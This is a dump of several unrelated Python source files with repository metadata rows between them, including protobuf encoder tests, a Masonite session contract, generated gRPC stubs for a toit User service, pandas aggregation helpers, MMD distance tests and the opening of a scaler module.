encoder.append_tag(6, WIRETYPE_VARINT)
encoder.append_uint64(2 ** 40)
buffer_size = len(encoder)
tube = io.BytesIO(encoder.tostring())
decoder = Decoder(tube)
self.assertEqual((0, WIRETYPE_VARINT), decoder.read_field_number_and_wire_type())
self.assertEqual(2**20, decoder.read_int32())
self.assertEqual((1, WIRETYPE_VARINT), decoder.read_field_number_and_wire_type())
self.assertEqual(-2**40, decoder.read_sint64())
self.assertEqual((2, WIRETYPE_LENGTH_DELIMITED), decoder.read_field_number_and_wire_type())
self.assertEqual(to_str("hello"), to_str(decoder.read_string()))
self.assertEqual((3, WIRETYPE_VARINT), decoder.read_field_number_and_wire_type())
self.assertEqual(True, decoder.read_bool())
self.assertEqual((4, WIRETYPE_FIXED64), decoder.read_field_number_and_wire_type())
self.assertAlmostEqual(3.14, decoder.read_float(), delta=0.001)
self.assertEqual(0.31415926, decoder.read_double())
self.assertEqual((5, WIRETYPE_VARINT), decoder.read_field_number_and_wire_type())
self.assertEqual(2**30, decoder.read_uint32())
self.assertEqual((6, WIRETYPE_VARINT), decoder.read_field_number_and_wire_type())
self.assertEqual(2**40, decoder.read_uint64())
self.assertEqual(buffer_size, decoder.position())
def testCEncodeAndDecode(self):
try:
from odps.tunnel.pb.encoder_c import Encoder
from odps.tunnel.pb.decoder_c import Decoder
encoder = Encoder()
encoder.append_tag(0, WIRETYPE_VARINT)
encoder.append_tag(1, WIRETYPE_VARINT)
encoder.append_sint64(-2 ** 40)
encoder.append_tag(2, WIRETYPE_LENGTH_DELIMITED)
encoder.append_string(to_binary("hello"))
encoder.append_tag(3, WIRETYPE_VARINT)
encoder.append_bool(True)
encoder.append_tag(4, WIRETYPE_FIXED64)
encoder.append_float(3.14)
encoder.append_double(0.31415926)
encoder.append_tag(5, WIRETYPE_VARINT)
encoder.append_uint32(2 ** 30)
encoder.append_tag(6, WIRETYPE_VARINT)
encoder.append_uint64(2 ** 40)
buffer_size = len(encoder)
tube = io.BytesIO(encoder.tostring())
decoder = Decoder(tube)
self.assertEqual((0, WIRETYPE_VARINT), decoder.read_field_number_and_wire_type())
self.assertEqual((1, WIRETYPE_VARINT), decoder.read_field_number_and_wire_type())
self.assertEqual(-2 ** 40, decoder.read_sint64())
self.assertEqual((2, WIRETYPE_LENGTH_DELIMITED), decoder.read_field_number_and_wire_type())
self.assertEqual(to_str("hello"), to_str(decoder.read_string()))
self.assertEqual((3, WIRETYPE_VARINT), decoder.read_field_number_and_wire_type())
self.assertEqual(True, decoder.read_bool())
self.assertEqual((4, WIRETYPE_FIXED64), decoder.read_field_number_and_wire_type())
self.assertAlmostEqual(3.14, decoder.read_float(), delta=0.001)
self.assertEqual(0.31415926, decoder.read_double())
self.assertEqual((5, WIRETYPE_VARINT), decoder.read_field_number_and_wire_type())
self.assertEqual(2 ** 30, decoder.read_uint32())
self.assertEqual((6, WIRETYPE_VARINT), decoder.read_field_number_and_wire_type())
self.assertEqual(2 ** 40, decoder.read_uint64())
self.assertEqual(buffer_size, decoder.position())
except ImportError:
warnings.warn('No Encoder or Decoder built by cython found')
if __name__ == '__main__':
unittest.main()
| 46.473684
| 103
| 0.68724
| 673
| 5,298
| 5.15899
| 0.224369
| 0.108583
| 0.064516
| 0.08871
| 0.765265
| 0.752016
| 0.752016
| 0.731279
| 0.731279
| 0.731279
| 0
| 0.041696
| 0.207814
| 5,298
| 113
| 104
| 46.884956
| 0.785561
| 0.115515
| 0
| 0.767442
| 0
| 0
| 0.0152
| 0
| 0
| 0
| 0
| 0
| 0.360465
| 1
| 0.023256
| false
| 0
| 0.127907
| 0
| 0.162791
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
f44485ae702c81a470e295357672b351b9da8c9a
| 440
|
py
|
Python
|
masonite/contracts/SessionContract.py
|
NinjasCL-labs/masonite-core
|
14053038891bd19f96303463bbe153b0c4819271
|
[
"MIT"
] | null | null | null |
masonite/contracts/SessionContract.py
|
NinjasCL-labs/masonite-core
|
14053038891bd19f96303463bbe153b0c4819271
|
[
"MIT"
] | null | null | null |
masonite/contracts/SessionContract.py
|
NinjasCL-labs/masonite-core
|
14053038891bd19f96303463bbe153b0c4819271
|
[
"MIT"
] | null | null | null |
from abc import ABC, abstractmethod
class SessionContract(ABC):
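    """Abstract contract listing the methods a concrete session driver must provide."""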
@abstractmethod
def get(self): pass
@abstractmethod
def set(self): pass
@abstractmethod
def has(self): pass
@abstractmethod
def all(self): pass
@abstractmethod
def delete(self): pass
@abstractmethod
def flash(self): pass
@abstractmethod
def reset(self): pass
@abstractmethod
def helper(self): pass
| 15.172414
| 35
| 0.652273
| 48
| 440
| 5.979167
| 0.354167
| 0.473868
| 0.536585
| 0.609756
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.265909
| 440
| 28
| 36
| 15.714286
| 0.888545
| 0
| 0
| 0.444444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.444444
| false
| 0.444444
| 0.055556
| 0
| 0.555556
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 6
|
f487832f5b5a637e81a3ed4db05271ba75164b67
| 12,708
|
py
|
Python
|
python/src/toit/api/user_pb2_grpc.py
|
toitware/ap
|
4b72d7ed43efe6b7e79bee1bfb5a9fc81fa16edb
|
[
"MIT"
] | 7
|
2020-03-20T14:10:53.000Z
|
2021-11-28T04:05:24.000Z
|
python/src/toit/api/user_pb2_grpc.py
|
toitware/ap
|
4b72d7ed43efe6b7e79bee1bfb5a9fc81fa16edb
|
[
"MIT"
] | 9
|
2020-03-19T06:54:17.000Z
|
2022-03-17T05:07:00.000Z
|
python/src/toit/api/user_pb2_grpc.py
|
toitware/ap
|
4b72d7ed43efe6b7e79bee1bfb5a9fc81fa16edb
|
[
"MIT"
] | 1
|
2021-08-15T16:31:07.000Z
|
2021-08-15T16:31:07.000Z
|
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
"""Client and server classes corresponding to protobuf-defined services."""
import grpc
from toit.api import organization_pb2 as toit_dot_api_dot_organization__pb2
from toit.api import user_pb2 as toit_dot_api_dot_user__pb2
class UserStub(object):
"""Missing associated documentation comment in .proto file."""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.SetPassword = channel.unary_unary(
'/toit.api.User/SetPassword',
request_serializer=toit_dot_api_dot_user__pb2.SetPasswordRequest.SerializeToString,
response_deserializer=toit_dot_api_dot_user__pb2.SetPasswordResponse.FromString,
)
self.InitiateResetPassword = channel.unary_unary(
'/toit.api.User/InitiateResetPassword',
request_serializer=toit_dot_api_dot_user__pb2.InitiateResetPasswordRequest.SerializeToString,
response_deserializer=toit_dot_api_dot_user__pb2.InitiateResetPasswordResponse.FromString,
)
self.ChangePasswordWithRPToken = channel.unary_unary(
'/toit.api.User/ChangePasswordWithRPToken',
request_serializer=toit_dot_api_dot_user__pb2.ChangePasswordWithRPTokenRequest.SerializeToString,
response_deserializer=toit_dot_api_dot_user__pb2.ChangePasswordWithRPTokenResponse.FromString,
)
self.GetCurrentUser = channel.unary_unary(
'/toit.api.User/GetCurrentUser',
request_serializer=toit_dot_api_dot_user__pb2.GetCurrentUserRequest.SerializeToString,
response_deserializer=toit_dot_api_dot_user__pb2.GetCurrentUserResponse.FromString,
)
self.ListOrganizations = channel.unary_unary(
'/toit.api.User/ListOrganizations',
request_serializer=toit_dot_api_dot_user__pb2.ListOrganizationsRequest.SerializeToString,
response_deserializer=toit_dot_api_dot_user__pb2.ListOrganizationsResponse.FromString,
)
self.ListUsers = channel.unary_unary(
'/toit.api.User/ListUsers',
request_serializer=toit_dot_api_dot_organization__pb2.ListUsersRequest.SerializeToString,
response_deserializer=toit_dot_api_dot_organization__pb2.ListUsersResponse.FromString,
)
self.CreateUser = channel.unary_unary(
'/toit.api.User/CreateUser',
request_serializer=toit_dot_api_dot_organization__pb2.CreateUserRequest.SerializeToString,
response_deserializer=toit_dot_api_dot_organization__pb2.CreateUserResponse.FromString,
)
class UserServicer(object):
"""Missing associated documentation comment in .proto file."""
def SetPassword(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def InitiateResetPassword(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ChangePasswordWithRPToken(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetCurrentUser(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListOrganizations(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListUsers(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def CreateUser(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_UserServicer_to_server(servicer, server):
rpc_method_handlers = {
'SetPassword': grpc.unary_unary_rpc_method_handler(
servicer.SetPassword,
request_deserializer=toit_dot_api_dot_user__pb2.SetPasswordRequest.FromString,
response_serializer=toit_dot_api_dot_user__pb2.SetPasswordResponse.SerializeToString,
),
'InitiateResetPassword': grpc.unary_unary_rpc_method_handler(
servicer.InitiateResetPassword,
request_deserializer=toit_dot_api_dot_user__pb2.InitiateResetPasswordRequest.FromString,
response_serializer=toit_dot_api_dot_user__pb2.InitiateResetPasswordResponse.SerializeToString,
),
'ChangePasswordWithRPToken': grpc.unary_unary_rpc_method_handler(
servicer.ChangePasswordWithRPToken,
request_deserializer=toit_dot_api_dot_user__pb2.ChangePasswordWithRPTokenRequest.FromString,
response_serializer=toit_dot_api_dot_user__pb2.ChangePasswordWithRPTokenResponse.SerializeToString,
),
'GetCurrentUser': grpc.unary_unary_rpc_method_handler(
servicer.GetCurrentUser,
request_deserializer=toit_dot_api_dot_user__pb2.GetCurrentUserRequest.FromString,
response_serializer=toit_dot_api_dot_user__pb2.GetCurrentUserResponse.SerializeToString,
),
'ListOrganizations': grpc.unary_unary_rpc_method_handler(
servicer.ListOrganizations,
request_deserializer=toit_dot_api_dot_user__pb2.ListOrganizationsRequest.FromString,
response_serializer=toit_dot_api_dot_user__pb2.ListOrganizationsResponse.SerializeToString,
),
'ListUsers': grpc.unary_unary_rpc_method_handler(
servicer.ListUsers,
request_deserializer=toit_dot_api_dot_organization__pb2.ListUsersRequest.FromString,
response_serializer=toit_dot_api_dot_organization__pb2.ListUsersResponse.SerializeToString,
),
'CreateUser': grpc.unary_unary_rpc_method_handler(
servicer.CreateUser,
request_deserializer=toit_dot_api_dot_organization__pb2.CreateUserRequest.FromString,
response_serializer=toit_dot_api_dot_organization__pb2.CreateUserResponse.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'toit.api.User', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
# This class is part of an EXPERIMENTAL API.
class User(object):
"""Missing associated documentation comment in .proto file."""
@staticmethod
def SetPassword(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/toit.api.User/SetPassword',
toit_dot_api_dot_user__pb2.SetPasswordRequest.SerializeToString,
toit_dot_api_dot_user__pb2.SetPasswordResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def InitiateResetPassword(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/toit.api.User/InitiateResetPassword',
toit_dot_api_dot_user__pb2.InitiateResetPasswordRequest.SerializeToString,
toit_dot_api_dot_user__pb2.InitiateResetPasswordResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def ChangePasswordWithRPToken(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/toit.api.User/ChangePasswordWithRPToken',
toit_dot_api_dot_user__pb2.ChangePasswordWithRPTokenRequest.SerializeToString,
toit_dot_api_dot_user__pb2.ChangePasswordWithRPTokenResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def GetCurrentUser(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/toit.api.User/GetCurrentUser',
toit_dot_api_dot_user__pb2.GetCurrentUserRequest.SerializeToString,
toit_dot_api_dot_user__pb2.GetCurrentUserResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def ListOrganizations(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/toit.api.User/ListOrganizations',
toit_dot_api_dot_user__pb2.ListOrganizationsRequest.SerializeToString,
toit_dot_api_dot_user__pb2.ListOrganizationsResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def ListUsers(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/toit.api.User/ListUsers',
toit_dot_api_dot_organization__pb2.ListUsersRequest.SerializeToString,
toit_dot_api_dot_organization__pb2.ListUsersResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def CreateUser(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/toit.api.User/CreateUser',
toit_dot_api_dot_organization__pb2.CreateUserRequest.SerializeToString,
toit_dot_api_dot_organization__pb2.CreateUserResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
| 47.774436
| 119
| 0.681933
| 1,176
| 12,708
| 7.007653
| 0.095238
| 0.037374
| 0.053392
| 0.069409
| 0.832909
| 0.832909
| 0.802087
| 0.731101
| 0.517898
| 0.410994
| 0
| 0.004814
| 0.248033
| 12,708
| 265
| 120
| 47.954717
| 0.857576
| 0.062952
| 0
| 0.502242
| 1
| 0
| 0.073259
| 0.03976
| 0
| 0
| 0
| 0
| 0
| 1
| 0.071749
| false
| 0.174888
| 0.013453
| 0.03139
| 0.130045
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 6
|
beafbae1e81abbe53ec1c0797f1ed6abd52a8675
| 37
|
py
|
Python
|
python/GMatNonLinearElastic/__init__.py
|
tdegeus/GMatNonLinearElastic
|
265463cd772ac318bee33a7705b7126ee53d59df
|
[
"MIT"
] | null | null | null |
python/GMatNonLinearElastic/__init__.py
|
tdegeus/GMatNonLinearElastic
|
265463cd772ac318bee33a7705b7126ee53d59df
|
[
"MIT"
] | 14
|
2019-04-11T14:16:36.000Z
|
2021-08-30T07:09:50.000Z
|
python/GMatNonLinearElastic/__init__.py
|
tdegeus/GMatNonLinearElastic
|
265463cd772ac318bee33a7705b7126ee53d59df
|
[
"MIT"
] | null | null | null |
from ._GMatNonLinearElastic import *
| 18.5
| 36
| 0.837838
| 3
| 37
| 10
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.108108
| 37
| 1
| 37
| 37
| 0.909091
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
bec050b50bcd70d20a5ae670e1f7f6d4ab972f79
| 15
|
py
|
Python
|
tasks/EPAM/python_course/foundation-python/l8/m8-5.py
|
AleksNeStu/projects
|
1a4c68dfbdcb77228f0f3617e58fd18fcb1f5dbb
|
[
"Apache-2.0"
] | 2
|
2022-01-19T18:01:35.000Z
|
2022-02-06T06:54:38.000Z
|
tasks/EPAM/python_course/foundation-python/l8/m8-5.py
|
AleksNeStu/projects
|
1a4c68dfbdcb77228f0f3617e58fd18fcb1f5dbb
|
[
"Apache-2.0"
] | null | null | null |
tasks/EPAM/python_course/foundation-python/l8/m8-5.py
|
AleksNeStu/projects
|
1a4c68dfbdcb77228f0f3617e58fd18fcb1f5dbb
|
[
"Apache-2.0"
] | null | null | null |
"""Slide"""
| 3
| 11
| 0.333333
| 1
| 15
| 5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.266667
| 15
| 4
| 12
| 3.75
| 0.454545
| 0.333333
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
fe3bba90c52421eab24a08a31fa6646de5a1200d
| 1,558
|
py
|
Python
|
inference-pipeline/inference_utils.py
|
w210-accessibility/classify-streetview
|
d60328484ea992b4cb2ffecb04bb548efaf06f1b
|
[
"MIT"
] | 2
|
2020-06-23T04:02:50.000Z
|
2022-02-08T00:59:24.000Z
|
inference-pipeline/inference_utils.py
|
w210-accessibility/classify-streetview
|
d60328484ea992b4cb2ffecb04bb548efaf06f1b
|
[
"MIT"
] | null | null | null |
inference-pipeline/inference_utils.py
|
w210-accessibility/classify-streetview
|
d60328484ea992b4cb2ffecb04bb548efaf06f1b
|
[
"MIT"
] | null | null | null |
import pandas as pd
import os
def aggregate_by_test_image(df_final):
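    # Collapse crop-level predictions to one row per (img_id, heading) pair:
    # count crops per prediction, then keep a single row per pair (the repo's "top vote").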
# Get the img_id, heading and crop_num info
df_final[['img_id', 'heading', 'crop_num']] = df_final['jpg_name'].str.replace(r'\.jpg$', '', regex=True).str.split('_', expand=True)
df_final['imgid_heading'] = df_final['img_id'].astype(str) + '_' + df_final['heading'].astype(str)
# Group based on image, prediction and ground_truth
df_group_final = df_final.groupby(['imgid_heading', 'prediction'])['jpg_name'].count()
df_group_final = df_group_final.reset_index()
df_group_final = df_group_final.sort_values(['imgid_heading', 'prediction'])
df_group_top_vote = df_group_final.drop_duplicates(subset = 'imgid_heading', keep = 'first')
return df_group_final, df_group_top_vote
def aggregate_by_image_with_groundtruth(df_final):
# Get the img_id, heading and crop_num info
df_final[['img_id', 'heading', 'crop_num']] = df_final['jpg_name'].str.replace(r'\.jpg$', '', regex=True).str.split('_', expand=True)
df_final['imgid_heading'] = df_final['img_id'].astype(str) + '_' + df_final['heading'].astype(str)
# Group based on image, prediction and ground_truth
df_group_final = df_final.groupby(['imgid_heading', 'prediction', 'ground_truth'])['jpg_name'].count()
df_group_final = df_group_final.reset_index()
df_group_final = df_group_final.sort_values(['imgid_heading', 'prediction'])
df_group_top_vote = df_group_final.drop_duplicates(subset = 'imgid_heading', keep = 'first')
return df_group_final, df_group_top_vote
| 47.212121
| 118
| 0.712452
| 229
| 1,558
| 4.427948
| 0.227074
| 0.12426
| 0.16568
| 0.110454
| 0.90927
| 0.90927
| 0.90927
| 0.90927
| 0.90927
| 0.90927
| 0
| 0
| 0.148267
| 1,558
| 33
| 119
| 47.212121
| 0.76413
| 0.117458
| 0
| 0.666667
| 0
| 0
| 0.202772
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.111111
| false
| 0
| 0.111111
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
22891c7338ca5ed8e6abcb7e14901a6b56c14ee9
| 5,704
|
py
|
Python
|
tests/test_mmd.py
|
imsb-uke/discern
|
064859763ece154c410f3e34a3189756c750d651
|
[
"MIT"
] | null | null | null |
tests/test_mmd.py
|
imsb-uke/discern
|
064859763ece154c410f3e34a3189756c750d651
|
[
"MIT"
] | null | null | null |
tests/test_mmd.py
|
imsb-uke/discern
|
064859763ece154c410f3e34a3189756c750d651
|
[
"MIT"
] | null | null | null |
"""Test mmd related functions."""
import numpy as np
import pytest
from sklearn.metrics.pairwise import euclidean_distances
from discern.mmd import mmd
def _mmd_loop(dist_xy, dist_xx, dist_yy, scales, sigma):
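    """Reference NumPy implementation: multi-scale Gaussian-kernel MMD estimate
    (diagonals zeroed for the within-sample terms), returning the maximum
    statistic over the candidate scales."""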
# pylint: disable=too-many-locals
stat = np.zeros_like(scales)
n_x = np.float(dist_xx.shape[0])
n_y = np.float(dist_yy.shape[0])
for i, k in enumerate(scales):
val = k * sigma
k_xx = np.exp(-dist_xx / (2 * val))
np.fill_diagonal(k_xx, 0.0)
k_xxnd = np.sum(k_xx) / (n_x * n_x - n_x)
k_yy = np.exp(-dist_yy / (2 * val))
np.fill_diagonal(k_yy, 0.0)
k_yynd = np.sum(k_yy) / (n_y * n_y - n_y)
res1 = k_xxnd + k_yynd
res2 = np.exp(-dist_xy / (2 * val))
res2 = np.sum(res2) * 2. / (n_x * n_y)
stat[i] = res1 - res2
return np.max(stat)
@pytest.mark.parametrize("n_rows", [10, 25, 100, 500, 1000])
@pytest.mark.parametrize("n_cols", [10, 25, 100, 500, 1000])
def test_calculate_distances(n_rows, n_cols):
"""Test _calculate_distances function."""
x = np.random.rand(n_rows, n_cols) # pylint: disable=invalid-name
y = np.random.rand(n_rows, n_cols) # pylint: disable=invalid-name
expected = (euclidean_distances(x, y)**2, euclidean_distances(x, x)**2,
euclidean_distances(y, y)**2)
got = mmd._calculate_distances(x, y) # pylint: disable=protected-access
np.testing.assert_allclose(got[0], expected[0])
np.testing.assert_allclose(got[1], expected[1])
np.testing.assert_allclose(got[2], expected[2])
@pytest.mark.parametrize("shape", [25, 100, 500, 1000])
@pytest.mark.parametrize("sigma", [0.1, 1., 5., 7.5, 15.])
def test_mmd_loop_py(shape, sigma):
"""Test _mmd_loop_py function."""
x = np.random.rand(shape, 1000).astype(np.float32) # pylint: disable=invalid-name
y = np.random.rand(shape, 1000).astype(np.float32) # pylint: disable=invalid-name
dist_xy, dist_xx, dist_yy = (euclidean_distances(x, y)**2,
euclidean_distances(x, x)**2,
euclidean_distances(y, y)**2)
scales = np.linspace(0.8, 1.5, num=23, dtype=np.float32)
sigma = np.float32(sigma)
expected = _mmd_loop(dist_xy, dist_xx, dist_yy, scales, sigma)
got = mmd._mmd_loop_py(dist_xy, dist_xx, dist_yy, scales, sigma) # pylint: disable=protected-access
np.testing.assert_allclose(got, expected, atol=1e-6)
@pytest.mark.parametrize(
"shape", (1000, 2000, pytest.param(4000, marks=pytest.mark.slow)))
def test_mmd_loop_py_unbalanced(shape):
"""Test _mmd_loop_py function."""
x = np.random.rand(100, 1000).astype(np.float32) # pylint: disable=invalid-name
y = np.random.rand(shape, 1000).astype(np.float32) # pylint: disable=invalid-name
dist_xy, dist_xx, dist_yy = (euclidean_distances(x, y)**2,
euclidean_distances(x, x)**2,
euclidean_distances(y, y)**2)
scales = np.linspace(0.8, 1.5, num=23, dtype=np.float32)
sigma = np.float32(6.)
expected = _mmd_loop(dist_xy, dist_xx, dist_yy, scales, sigma)
got = mmd._mmd_loop_py(dist_xy, dist_xx, dist_yy, scales, sigma) # pylint: disable=protected-access
np.testing.assert_allclose(got, expected, atol=1e-6)
@pytest.mark.skipif(not mmd.USE_C_IMPLEMENTATION,
reason="Testing C version required compiled binary")
@pytest.mark.parametrize("shape", [25, 100, 500, 1000])
@pytest.mark.parametrize("sigma", [0.1, 1., 5., 7.5, 15.])
def test_mmd_loop_c_version(shape, sigma):
"""Test _mmd_loop function."""
x = np.random.rand(shape, 1000).astype(np.float32) # pylint: disable=invalid-name
y = np.random.rand(shape, 1000).astype(np.float32) # pylint: disable=invalid-name
dist_xy, dist_xx, dist_yy = (euclidean_distances(x, y)**2,
euclidean_distances(x, x)**2,
euclidean_distances(y, y)**2)
scales = np.linspace(0.8, 1.5, num=23, dtype=np.float32)
sigma = np.float32(sigma)
expected = _mmd_loop(dist_xy, dist_xx, dist_yy, scales, sigma)
got = mmd._mmd_loop_c(dist_xy, dist_xx, dist_yy, scales, sigma) # pylint: disable=protected-access
np.testing.assert_allclose(got, expected, atol=1e-6)
@pytest.mark.skipif(not mmd.USE_C_IMPLEMENTATION,
reason="Testing C version required compiled binary")
@pytest.mark.parametrize(
"shape", (1000, 2000, pytest.param(4000, marks=pytest.mark.slow)))
def test_mmd_loop_c_version_unbalanced(shape):
"""Test _mmd_loop function."""
x = np.random.rand(100, 1000).astype(np.float32) # pylint: disable=invalid-name
y = np.random.rand(shape, 1000).astype(np.float32) # pylint: disable=invalid-name
dist_xy, dist_xx, dist_yy = (euclidean_distances(x, y)**2,
euclidean_distances(x, x)**2,
euclidean_distances(y, y)**2)
scales = np.linspace(0.8, 1.5, num=23, dtype=np.float32)
sigma = np.float32(6.)
expected = _mmd_loop(dist_xy, dist_xx, dist_yy, scales, sigma)
got = mmd._mmd_loop_c(dist_xy, dist_xx, dist_yy, scales, sigma) # pylint: disable=protected-access
np.testing.assert_allclose(got, expected, atol=1e-6)
def test_mmd():
"""Test if mmd_loss throws exception."""
np.random.seed(42)
x = np.random.rand(1000, 500).astype(np.float32) # pylint: disable=invalid-name
y = np.random.rand(950, 500).astype(np.float32) # pylint: disable=invalid-name
got = mmd.mmd_loss(x, y, 5.0)
np.testing.assert_allclose(got, 1.418614e-06, rtol=0.0018)
np.random.seed(None) # To re-seed the generator for different functions
| 47.932773
| 104
| 0.649194
| 869
| 5,704
| 4.0771
| 0.143844
| 0.066046
| 0.036692
| 0.04403
| 0.80271
| 0.773074
| 0.757832
| 0.732712
| 0.71352
| 0.69094
| 0
| 0.059018
| 0.203892
| 5,704
| 118
| 105
| 48.338983
| 0.721207
| 0.140077
| 0
| 0.557895
| 0
| 0
| 0.025974
| 0
| 0
| 0
| 0
| 0
| 0.084211
| 1
| 0.073684
| false
| 0
| 0.042105
| 0
| 0.126316
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
22e12a864506c768a8a3d083766b5b970f484401
| 12,214
|
py
|
Python
|
pipesnake/transformers/scaler.py
|
pierluigi-failla/pipesnake
|
db63e093d61470b5bc1f12baeec39688a9ea45f7
|
[
"MIT"
] | null | null | null |
pipesnake/transformers/scaler.py
|
pierluigi-failla/pipesnake
|
db63e093d61470b5bc1f12baeec39688a9ea45f7
|
[
"MIT"
] | null | null | null |
pipesnake/transformers/scaler.py
|
pierluigi-failla/pipesnake
|
db63e093d61470b5bc1f12baeec39688a9ea45f7
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import logging
import numpy
from pipesnake.base import Transformer
from pipesnake.base.utils import _check_cols
__all__ = [
'MinMaxScaler',
'StdScaler',
'MadScaler',
'UnitLenghtScaler',
]
class MinMaxScaler(Transformer):
"""Min max scaler.
This will scale the data (by columns) to fit [min; max] interval.
Args:
:param x_cols: a list of column names or a list of indices; 'all' to use all columns; if [] no columns will be affected (default: `[]`)
:param y_cols: a list of column names or a list of indices; 'all' to use all columns; if [] no columns will be affected (default: `[]`)
:param min_value: min value after scaling (default: `-1.0`)
